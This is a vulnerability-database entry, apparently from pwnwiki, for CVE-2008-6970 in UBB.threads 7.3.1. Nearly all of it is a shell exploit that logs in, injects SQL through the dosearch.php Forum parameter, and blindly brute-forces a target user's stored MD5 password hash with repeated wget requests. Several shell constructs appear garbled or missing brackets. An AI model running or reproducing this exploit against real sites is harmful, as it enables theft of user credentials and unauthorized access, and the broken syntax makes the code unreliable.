Loading
0

CVE-2008-6970 UBB.threads 7.3.1 SQL注入漏洞

免费、自由、人人可编辑的漏洞库

,

INFO

DESCRIPTION

Exploits PHP parameter input validation flaw and blindly brute force stored MD5 SQL hash for given user ID. 

FILE

<pre>
CVE-2008-6970.sh - Shell code program.

SOURCE

https://github.com/KyomaHooin/CVE-2008-6970

CVE-2008-6970.sh

#!/bin/sh
#
# UBB 7.3.1 dosearch.php blind SQL injection brute force attack
#

hex=(A B C D E F 0 1 2 3 4 5 6 7 8 9)
main='http://removed/ubbthreads/ubbthreads.php'
login='ubb=start_page&Loginname=removed&Loginpass=removed&firstlogin=1&from=http%3A%2F%2Fremoved%2Fubbthreads%2Fubbthreads.php%3Fubb%3Ddosearch%26amp%3Bfromsearch%3D1%26amp%3BWords%3Dmove%26amp%3BForum%5B%5D%3Df2%2527%29%29%2Band%2B1%253D1%2F*&buttlogin=Log+In'
base="$main?ubb=dosearch&fromsearch=1&Words=body"
inject="&Forum=f2')) AND (SELECT 1 FROM w3t_USERS WHERE USER_ID%3D3 AND UPPER(USER_PASSWORD) LIKE 'R%')%3D1/*"

hash=()

replace(){
	echo $1 | sed "s/LIKE '\(_*\)\(.*\)%'/LIKE '\1$2%'/"
}

push(){
	echo $1 | sed "s/LIKE '\(_*\)\(.*\)%'/LIKE '\1_$2%'/"
}

brute(){
	for char in ${hex*}; do
		#replace string
		inj=`replace "$inject" $char`
		#inject
		wget -O ubb --load-cookies cookies.txt --keep-session-cookies --save-cookies cookies.txt "$base$inj"
		#if match then return characters to hash array
		if  -z `cat ubb | grep "There are no results"` ; then
			hash+=($char)
			return
		fi
		rm ubb
	done
}

# INIT

#get PHPSESSID cookie
wget -O /dev/null --keep-session-cookies --save-cookies cookies.txt $main
#login & get UBB cookies & inject SQL to bypass dosearch.inc.php access restriction
wget -O /dev/null --load-cookies cookies.txt --keep-session-cookies --save-cookies cookies.txt --post-data=$login $main
#blind SQL injection brute force attack
for ((i=0; i<32;i++)); do
	brute
	inject=`push "$inject" "R"`
done
#clean
rm cookies.txt
#print the hash
printf "%s" "${hash@}" >> hash.txt


pwnwiki.com